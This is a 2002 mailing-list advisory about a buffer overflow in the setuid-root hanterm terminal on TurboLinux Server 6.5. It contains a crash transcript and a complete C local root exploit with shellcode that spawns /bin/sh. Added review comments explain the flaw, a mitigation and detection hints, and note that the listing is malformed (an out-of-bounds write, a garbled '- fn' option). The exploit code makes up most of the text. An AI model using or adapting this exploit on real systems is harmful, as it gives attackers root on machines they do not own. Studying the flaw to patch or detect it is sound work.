Overflow Vulnerabilities in hanterm
From: xperc <xperc () hotmail com>
Date: 7 Feb 2002 10:33:27 -0000
Hi,I'm xperc. hanterm is Hangul terminal for X. it is based on the xterm in XFree86. The hanterm binary is default installed with setuid root permissions for TurboLinux Server 6.5. but contains insecure code with allows unprivileged local users to obtain root access on the local system.
$which hanterm
/usr/bin/X11/hanterm
$ls -l /usr/bin/X11/hanterm
-rws--x--x 1 root root 166100 03 13 2001 /usr/bin/X11/hanterm*
$rpm -qf /usr/bin/X11/hanterm
hanterm-xf-p18-3.3-6
$hanterm -fn `perl -e 'print "a"x100'`
Segmentation fault
$hanterm -hfb `perl -e 'print "a"x8000'`
Segmentation fault
$hanterm -hfn `perl -e 'print "a"x8000'`
Segmentation fault
...etc
/* hanterm_exp.c
 *
 * local exploit for hanterm
 * .. tested in TurboLinux Server 6.5 (Japan)
 *
 * thanks my Japanese friend kaju(kaijyu)
 * and Japanese hacker UNYUN.
 *
 * by xperc () hotmail com
 * 2002/02/07
 */

/*
 * Review notes (defender's reading of this listing):
 *
 * - The defect is in hanterm, not in this file: the segfaults in the
 *   transcript above and the return-address spray below point to an
 *   unchecked copy of the -fn / -hfb / -hfn option values into a fixed-size
 *   stack buffer (presumably in the option parser — confirm against the
 *   hanterm source). Because the package installs the binary setuid root
 *   (-rws--x--x above), the overflow runs with euid 0.
 * - Mitigation until a fixed package is installed: clear the setuid bit
 *   (chmod u-s /usr/bin/X11/hanterm) so hanterm runs with the caller's own
 *   privileges; the overflow then yields nothing the user did not already have.
 * - Detection: a root-owned hanterm process spawning a shell, or hanterm
 *   started with an abnormally long -fn/-hfb/-hfn argument.
 * - The listing itself is not well-formed C: memset/strlen/strncpy
 *   (<string.h>) and execl (<unistd.h>) are called without prototypes, only
 *   <stdio.h> is included, printf's %p is handed an unsigned int, and the
 *   spray loop writes past the end of buf (see the note at the loop).
 */

#include <stdio.h>

#define NOP 0x90          /* filler byte: single-byte x86 no-op, used for the sled */
#define MAXBUF 88         /* size of the argument buffer handed to hanterm */
#define RETOFS 84         /* centre of the return-address spray inside buf */
#define SHELL_OFS 22      /* offset inside buf where the payload bytes are copied */
#define ESP_OFS -0xe38    /* hard-coded, environment-dependent offset added to this
                             process's %esp to guess where buf lands in the child */

/*
 * Returns the current stack pointer.
 * There is no C return statement: the value is left in %eax and the function
 * relies on %eax being the i386 return register (GCC-specific idiom; strictly
 * undefined behaviour in C).
 */
unsigned int get_esp() { __asm__("mov %esp,%eax"); }

int main() {
    /*
     * i386 payload: two int 0x80 calls with al = 0x17 (setuid) and 0x2e
     * (setgid), then execve of the trailing "/bin/sh" string (bytes
     * 0x2f 0x62 0x69 0x6e 0x2f 0x73 0x68). 55 bytes including the final 0x00,
     * which is the only zero byte, so strlen() below yields 54.
     */
    static char shellcode[]={
        0x31,0xc0,0x31,0xdb,0xb0,0x17,0xcd,0x80,
        0x31,0xc0,0x31,0xdb,0xb0,0x2e,0xcd,0x80,
        0xeb,0x18,0x5e,0x89,0x76,0x08,0x31,0xc0,
        0x88,0x46,0x07,0x89,0x46,0x0c,0xb0,0x0b,
        0x89,0xf3,0x8d,0x4e,0x08,0x8d,0x56,0x0c,
        0xcd,0x80,0xe8,0xe3,0xff,0xff,0xff,0x2f,
        0x62,0x69,0x6e,0x2f,0x73,0x68,0x00
    };
    unsigned int retadr;   /* guessed address inside the child's copy of buf */
    char buf[MAXBUF];      /* argument string passed to hanterm via -fn */
    int i;

    /* Fill the whole buffer with NOPs so any landing inside the sled slides
     * forward into the payload. */
    memset(buf,NOP,MAXBUF);

    retadr=get_esp()+ESP_OFS;
    /* %p expects a void *, retadr is unsigned int: mismatched format argument
     * (undefined behaviour; -Wformat warns). */
    printf("Jumping address = %p\n",retadr);

    /*
     * Write retadr little-endian every 4 bytes from RETOFS-32 to RETOFS+28.
     * NOTE(review): i takes the values 52, 56, ..., 112, so buf[88..115] is
     * written although buf holds only MAXBUF = 88 bytes — a 28-byte
     * out-of-bounds write on this program's own stack (undefined behaviour),
     * unrelated to the bug in hanterm.
     */
    for(i=RETOFS-32;i<RETOFS+32;i+=4){
        buf[i]  =retadr&0xff;
        buf[i+1]=(retadr>>8)&0xff;
        buf[i+2]=(retadr>>16)&0xff;
        buf[i+3]=(retadr>>24)&0xff;
    }

    /* Copy the 54 payload bytes to buf[22..75], overwriting the part of the
     * spray that fell in that range; the copy adds no NUL terminator. */
    strncpy(buf+SHELL_OFS,shellcode,strlen (shellcode));
    //buf[MAXBUF-1]='\0'; faint!:-(

    /*
     * buf is left unterminated (the terminator above is commented out), so the
     * string execl passes extends past buf into whatever follows it on the
     * stack — undefined behaviour the listing appears to depend on.
     * NOTE(review): "- fn" with an embedded space looks like an archive
     * transcription artifact of the -fn option shown in the transcript above.
     */
    execl("/usr/bin/X11/hanterm","hanterm","- fn",buf,(char *)0);
}